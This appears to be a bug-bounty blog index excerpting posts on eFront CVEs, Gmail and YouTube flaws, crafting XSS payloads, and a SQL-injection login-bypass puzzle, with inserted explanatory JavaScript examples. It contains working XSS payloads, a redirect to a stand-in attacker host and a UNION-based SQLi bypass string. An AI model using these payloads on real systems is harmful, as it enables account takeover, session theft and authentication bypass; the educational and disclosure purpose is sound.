Posts

Multiple Vulnerabilities in eFront CMS v3.6.15.4

Hi friends, I am back with three stories today. There are multiple critical bugs affecting eFront, one of the top 10 e-learning CMSs available, in version 3.6.15.4 build 18023. The details are as follows.

Directory Traversal (CVE-2015-4461)
Local File Inclusion (CVE-2015-4462)
Bypass for blocked extension file uploads (CVE-2015-4463)

About eFront: eFront is one of the top 10 e-learning CMSs available free on the market to date. A short description from the vendor's site: "The core of eFront is distributed as an open-source project. We have created a superior training product and we are not afraid to let you try it! The open-source edition of eFront will cover a wide range of your needs. If you are looking for a specialized solution then take a look at the different eFront editions." The issues are fixed in the new release, eFront v3.6.15.5 build 18024. You can find the chan...

How I was able to send a mail with your email ID?

How I was able to send a mail with your email ID? Is it possible? Yes, it is. If you are using Gmail, until yesterday I could send email with your email ID. Do you want to know how? Read my story then.... Hi friends, this is Mohan Kallepalli, again with another bug in Gmail... Thanks to Facebook, another day started with frustration. I will tell you that story another time. Anyway, with the frustration on Facebook, I turned my focus to my favorite Google one more time. While I was going through the Gmail settings, thanks to my low-speed internet, my browser suggested I use "Basic HTML". Once I opened my settings in Basic HTML, I went to the Accounts section and there I saw the functionality for adding another user's email ID to your "send email as" list. This functionality is protected by a verification code mechanism, which means Gmail will send a verification code (9 digits) to the target email ID and you need to enter that code in your v...

YouTube URL Redirection..

Hi guys, another bug in Google. This time it is with youtube.com. Hmm, found a bug in YouTube, but unfortunately this bug is out of scope. Anyway, a bug is a bug. Let's see. The issue is a URL redirection vulnerability that existed in upload.youtube.com. When you upload a video that is not proper (invalid), the application redirects you to an error URL. This URL is sent to the server as a parameter, error_redirect. I tried changing the URL to some random domain, and guess what, it redirected there as I had uploaded an invalid video. Then, in the request, I observed two user-specific tokens going to the server. They are nothing but anti-CSRF tokens, and they work properly with a valid video. But in the case of an invalid video, they are no longer validated and are ignored. So I sent the request with an invalid file, but this time I removed the user-specific tokens user_token and session_token. And as I expected, the application issued a 302 redirection...
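The two defects described above (the anti-CSRF tokens skipped on the invalid-file path, and error_redirect followed verbatim) as an added example. This is constructed code, not YouTube's: the parameter names error_redirect, user_token and session_token follow the post, while SITE_ORIGIN, the SESSION token values, the file check and the fallback path are assumptions made for this example.

```javascript
// Added example (not YouTube's code): a constructed upload handler with the
// two defects the post describes, next to a hardened version.

const SITE_ORIGIN = "https://example.test"; // assumed origin of the upload page

// Constructed session: the tokens the server expects for this user.
const SESSION = { user_token: "u-7f3a", session_token: "s-91c0" };

function isValidVideo(file) {
  return Boolean(file) && file.mime === "video/mp4" && file.size > 0;
}

function tokensValid(params) {
  return params.user_token === SESSION.user_token &&
         params.session_token === SESSION.session_token;
}

// Vulnerable: an invalid file short-circuits to the redirect before the tokens
// are looked at, and the Location value is whatever the client sent.
function handleUploadVulnerable(params) {
  if (!isValidVideo(params.file)) {
    return { status: 302, location: params.error_redirect };
  }
  if (!tokensValid(params)) {
    return { status: 403 };
  }
  return { status: 200 };
}

// Reduce error_redirect to a path on our own origin. Resolving against the
// base catches absolute URLs, protocol-relative "//evil" and "javascript:"
// (whose origin is "null"); anything off-origin falls back to a fixed page.
function safeRedirectTarget(raw, fallback) {
  if (typeof raw !== "string") return fallback;
  let url;
  try {
    url = new URL(raw, SITE_ORIGIN);
  } catch (e) {
    return fallback;
  }
  if (url.origin !== SITE_ORIGIN) return fallback;
  return url.pathname + url.search;
}

// Hardened: tokens are checked first on every path, and the redirect target is
// validated before it is emitted.
function handleUploadHardened(params) {
  if (!tokensValid(params)) {
    return { status: 403 };
  }
  if (!isValidVideo(params.file)) {
    return {
      status: 302,
      location: safeRedirectTarget(params.error_redirect, "/upload/error"),
    };
  }
  return { status: 200 };
}

// Constructed request: invalid file, no tokens, attacker-chosen redirect.
const forged = {
  file: { mime: "text/plain", size: 3 },
  error_redirect: "https://evil.test/phish",
};
console.log(handleUploadVulnerable(forged)); // 302 to https://evil.test/phish
console.log(handleUploadHardened(forged));   // 403
```

The order of the checks is the point: a request that fails validation must still be authenticated before the server acts on any of its parameters, and a redirect parameter is output that needs its own validation regardless of which branch produced it.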

g00gle Spreadsheet XSS


Tailoring Custom JavaScript Payloads for a Successful XSS...

Hey guys, today I would like to show you how I was able to create custom XSS payloads based on the existing JavaScript in various websites. Note that this write-up does not show you how to get XSS in various websites; it covers various ways to create custom XSS payloads. The approach I follow to create a successful XSS payload involves three steps.

1. Analyse the native code
2. Construct the correct syntax
3. Execute the payload

For explanation purposes I considered GET-based user input; however, this method works with the POST method also.

1. Analyse: This stage involves the analysis of the web page code in which we are creating a payload. The main limitation at this stage is that the user input we enter must be reflected between script tags. index.php?name=test should return the payload as follows.

<script>
...........
.. test ..
...........
</script>

If the user input is not rendering in bet...
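The three steps applied to one concrete reflection point, as an added example that is not code from the post. The page template (a `name` parameter reflected into a double-quoted string inside an inline script), the helper names and the fake `document` object are all constructed here; the payload shape `";alert(1);//` is what the analysis of that template yields.

```javascript
// Added example (not from the post): a constructed page that reflects
// index.php?name=... unescaped inside an inline <script>, and the three steps
// (analyse, construct, execute) applied to it.

// Step 0: constructed "server". The value lands inside a double-quoted
// JavaScript string literal.
function renderPage(name) {
  return [
    "<html><body>",
    "<script>",
    'var user = "' + name + '";',
    "document.title = 'Hello ' + user;",
    "</script>",
    "</body></html>",
  ].join("\n");
}

// Step 1 (analyse): isolate the inline script the way the HTML parser does.
// The first </script> ends the script element whatever quotes are open, so a
// tag-based payload such as <script>alert(1)</script> truncates the script
// and leaves a syntax error instead of adding a second script.
function extractScript(html) {
  const m = html.match(/<script>([\s\S]*?)<\/script>/);
  return m ? m[1] : "";
}

// A script that does not parse runs nothing at all, so check that first.
function parses(js) {
  try { new Function(js); return true; } catch (e) { return false; }
}

// Step 2 (construct): the reflection sits inside "...", so the payload closes
// the string, ends the statement, adds our call and comments out the trailing
// `";` the template appends. The rest of the script keeps parsing.
function buildPayload(jsCall) {
  return '";' + jsCall + ';//';
}

// Step 3 (execute): run the script with a fake document and an alert() that
// records its argument instead of opening a dialog.
function runInlineScript(js) {
  const alerts = [];
  const fakeDocument = { title: "" };
  new Function("document", "alert", js)(fakeDocument, (x) => alerts.push(x));
  return { alerts: alerts, title: fakeDocument.title };
}

// Render, extract, check syntax, run.
function demo(name) {
  const js = extractScript(renderPage(name));
  if (!parses(js)) return { parses: false, alerts: [], title: "" };
  return Object.assign({ parses: true }, runInlineScript(js));
}

// Constructed inputs for the three cases.
console.log(demo("test"));                      // benign: title "Hello test"
console.log(demo("<script>alert(1)</script>")); // script truncated, nothing runs
console.log(demo(buildPayload("alert(1)")));    // alerts [1]
```

The second case is the reason step 1 exists: a payload that ignores the surrounding syntax can break the whole script rather than run inside it, and a broken script executes nothing.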

How I Got My First Bounty.. " A Tale of GMAIL Stored XSS "

Hey guys, I reported this bug long back and it is fixed now. Let's jump into the story. In the Gmail settings General tab, there is an option for creating an automatic mail responder, in case we go on vacation and don't want to be disturbed. While going through Gmail, like everyone else, I also ignored that feature and tried here and there. At the same time one of my good friends, @iampr3m, was also testing Gmail and trying hard to find something in the same settings page. However, he began his testing from the top, in the Signature feature. So I started testing the settings page from the bottom, and I got lucky to have the vacation responder at the bottom of the page. While testing, I observed that the vacation message is rendered inside a div tag. So as usual, I used a simple payload with an img tag ( <img src=a onerror=alert(1)> ) to test my luck. As soon as the payload was entered with < and >, the server invalidat...

Simple Login Page Bypass..

Simple Login Page Bypass Using SQLi. The following code is being used in a login check page. Find the proper credentials for getting a successful authentication alert.

    <?php
    // Assumed (not shown on the page): the submitted username is concatenated
    // straight into the query, which is what the injection below relies on.
    $user = $_POST['username'];
    $pwd  = $_POST['password'];
    $sql  = "SELECT * FROM users WHERE username = '$user'";

    $result = mysql_query($sql);
    if (mysql_num_rows($result) == 0) {
        echo "<script>alert('failed')</script>";
    } else {
        $res = mysql_fetch_array($result);
        // Success requires: column index 2 equal to the submitted password,
        // column index 7 falsy and column index 3 truthy.
        if ($res[2] == $pwd && ((!$res[7]) && ($res[3]))) {
            echo "<script>alert('success');</script>";
        } else {
            echo "<script>alert('failed');</script>";
        }
    }

Find USERNAME & PASSWORD, or find the answers here:

username : ' UNION SELECT 'TEST','FOR','SQLI',1,'N','USER','NAME',0 -- -
password : SQLI

The UNION row supplies 'SQLI' at index 2, 1 at index 3 and 0 at index 7, so every condition in the check holds; the trailing -- - comments out the closing quote of the original query.